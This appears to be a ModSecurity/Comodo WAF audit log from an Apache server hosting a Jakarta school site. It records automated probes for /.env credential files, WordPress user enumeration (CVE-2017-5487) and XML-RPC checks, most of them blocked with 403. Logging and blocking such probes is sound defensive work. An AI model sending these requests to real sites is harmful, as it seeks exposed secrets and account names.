User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--abecac51-C--
demo.sayHello
--abecac51-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--abecac51-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744994129662839 6194 (- - -)
Stopwatch2: 1744994129662839 6194; combined=4845, p1=614, p2=3890, p3=23, p4=25, p5=160, sr=69, sw=133, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--abecac51-Z--
--2303065a-A--
[18/Apr/2025:23:35:43 +0700] aAJ_Xxk6uTiIdxrJEERnVgAAAM4 103.236.140.4 43810 103.236.140.4 8181
--2303065a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.93.110
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.93.110
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--2303065a-C--
demo.sayHello
--2303065a-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2303065a-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744994143673750 6643 (- - -)
Stopwatch2: 1744994143673750 6643; combined=4762, p1=711, p2=3789, p3=36, p4=40, p5=108, sr=193, sw=78, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2303065a-Z--
--f639f11b-A--
[18/Apr/2025:23:51:10 +0700] aAKC_jpR4B6O-aqWibN9DwAAAJQ 103.236.140.4 47310 103.236.140.4 8181
--f639f11b-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 142.93.0.66
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 142.93.0.66
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--f639f11b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f639f11b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744995070420605 776 (- - -)
Stopwatch2: 1744995070420605 776; combined=310, p1=276, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f639f11b-Z--
--9a50db75-A--
[19/Apr/2025:00:19:57 +0700] aAKJvVyj-eUTITfvHEXjkwAAAA8 103.236.140.4 53896 103.236.140.4 8181
--9a50db75-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 188.166.108.93
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 188.166.108.93
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--9a50db75-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9a50db75-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744996797042802 754 (- - -)
Stopwatch2: 1744996797042802 754; combined=323, p1=286, p2=0, p3=0, p4=0, p5=37, sr=110, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9a50db75-Z--
--9f879309-A--
[19/Apr/2025:01:44:40 +0700] aAKdmFyj-eUTITfvHEXwFAAAAAo 103.236.140.4 37070 103.236.140.4 8181
--9f879309-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 157.245.113.227
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 157.245.113.227
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--9f879309-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9f879309-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745001880755317 838 (- - -)
Stopwatch2: 1745001880755317 838; combined=322, p1=284, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9f879309-Z--
--c17e840a-A--
[19/Apr/2025:01:45:56 +0700] aAKd5DlhhbF_BYhFYTWlvQAAAEk 103.236.140.4 37370 103.236.140.4 8181
--c17e840a-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://smkn22-jkt.sch.id
Host: smkn22-jkt.sch.id
X-Real-IP: 154.86.112.29
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.86.112.29
X-Forwarded-Proto: https
Connection: close
Origin: https://smkn22-jkt.sch.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
--c17e840a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c17e840a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745001956620746 3135 (- - -)
Stopwatch2: 1745001956620746 3135; combined=1356, p1=461, p2=855, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c17e840a-Z--
--0035893a-A--
[19/Apr/2025:01:54:10 +0700] aAKf0hk6uTiIdxrJEERxUwAAANQ 103.236.140.4 39324 103.236.140.4 8181
--0035893a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.118.228
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.118.228
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: */*
--0035893a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0035893a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745002450147221 888 (- - -)
Stopwatch2: 1745002450147221 888; combined=389, p1=330, p2=0, p3=0, p4=0, p5=58, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0035893a-Z--
--9d220555-A--
[19/Apr/2025:02:20:10 +0700] aAKl6jlhhbF_BYhFYTWnMAAAAEI 103.236.140.4 45198 103.236.140.4 8181
--9d220555-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.117.233
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.117.233
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--9d220555-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9d220555-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745004010426668 797 (- - -)
Stopwatch2: 1745004010426668 797; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9d220555-Z--
--68e3fa6d-A--
[19/Apr/2025:02:20:37 +0700] aAKmBVyj-eUTITfvHEXy0QAAABg 103.236.140.4 45304 103.236.140.4 8181
--68e3fa6d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.117.233
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.117.233
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--68e3fa6d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--68e3fa6d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745004037230007 725 (- - -)
Stopwatch2: 1745004037230007 725; combined=292, p1=260, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--68e3fa6d-Z--
--5603a760-A--
[19/Apr/2025:03:35:04 +0700] aAK3eA6cTFSgLAHl7PpLmwAAABY 103.236.140.4 34028 103.236.140.4 8181
--5603a760-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.115.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.115.90
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--5603a760-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5603a760-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745008504452628 3592 (- - -)
Stopwatch2: 1745008504452628 3592; combined=1533, p1=472, p2=1029, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5603a760-Z--
--3ad2de73-A--
[19/Apr/2025:03:35:06 +0700] aAK3euvDiFC_ir7MDwZxygAAAEc 103.236.140.4 34040 103.236.140.4 8181
--3ad2de73-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.115.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.115.90
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--3ad2de73-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3ad2de73-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745008506667902 2745 (- - -)
Stopwatch2: 1745008506667902 2745; combined=1190, p1=418, p2=743, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3ad2de73-Z--
--79e8d706-A--
[19/Apr/2025:03:35:08 +0700] aAK3fHNa4dA2HllpK_MEbwAAAI8 103.236.140.4 34052 103.236.140.4 8181
--79e8d706-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.115.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.115.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--79e8d706-C--
demo.sayHello
--79e8d706-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--79e8d706-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745008508883090 5297 (- - -)
Stopwatch2: 1745008508883090 5297; combined=3972, p1=558, p2=3187, p3=22, p4=24, p5=103, sr=113, sw=78, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--79e8d706-Z--
--05183e58-A--
[19/Apr/2025:03:35:23 +0700] aAK3iw6cTFSgLAHl7PpLogAAAAs 103.236.140.4 34112 103.236.140.4 8181
--05183e58-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.115.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.115.90
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--05183e58-C--
demo.sayHello
--05183e58-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--05183e58-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745008523416916 7233 (- - -)
Stopwatch2: 1745008523416916 7233; combined=5151, p1=644, p2=4222, p3=39, p4=45, p5=116, sr=104, sw=85, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--05183e58-Z--
--b138ab1a-A--
[19/Apr/2025:03:36:24 +0700] aAK3yOvDiFC_ir7MDwZx4AAAAEI 103.236.140.4 34344 103.236.140.4 8181
--b138ab1a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.203.68.19
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.203.68.19
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--b138ab1a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b138ab1a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745008584268601 793 (- - -)
Stopwatch2: 1745008584268601 793; combined=329, p1=290, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b138ab1a-Z--
--40da686e-A--
[19/Apr/2025:03:48:17 +0700] aAK6kXNa4dA2HllpK_MFAAAAAJg 103.236.140.4 37042 103.236.140.4 8181
--40da686e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.17
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.17
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--40da686e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--40da686e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745009297570585 807 (- - -)
Stopwatch2: 1745009297570585 807; combined=358, p1=321, p2=0, p3=0, p4=0, p5=37, sr=123, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--40da686e-Z--
--9c011c6d-A--
[19/Apr/2025:03:57:57 +0700] aAK81evDiFC_ir7MDwZzPgAAAFQ 103.236.140.4 39270 103.236.140.4 8181
--9c011c6d-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 209.97.180.8
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 209.97.180.8
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--9c011c6d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9c011c6d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745009877991666 736 (- - -)
Stopwatch2: 1745009877991666 736; combined=302, p1=262, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9c011c6d-Z--
--4567ba71-A--
[19/Apr/2025:04:51:44 +0700] aALJcA6cTFSgLAHl7PpRzwAAABU 103.236.140.4 56150 103.236.140.4 8181
--4567ba71-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.118.228
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.118.228
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: */*
--4567ba71-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4567ba71-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745013104446393 785 (- - -)
Stopwatch2: 1745013104446393 785; combined=330, p1=292, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4567ba71-Z--
--10a3e15e-A--
[19/Apr/2025:05:37:31 +0700] aALUK-vDiFC_ir7MDwZ7JAAAAEM 103.236.140.4 41658 103.236.140.4 8181
--10a3e15e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.114.106.215
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.114.106.215
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--10a3e15e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--10a3e15e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745015851816529 797 (- - -)
Stopwatch2: 1745015851816529 797; combined=336, p1=296, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--10a3e15e-Z--
--6abcc05c-A--
[19/Apr/2025:05:37:32 +0700] aALULEruoUXZj665VUF2tAAAAMg 103.236.140.4 41666 103.236.140.4 8181
--6abcc05c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.114.106.215
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.114.106.215
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--6abcc05c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6abcc05c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745015852475148 782 (- - -)
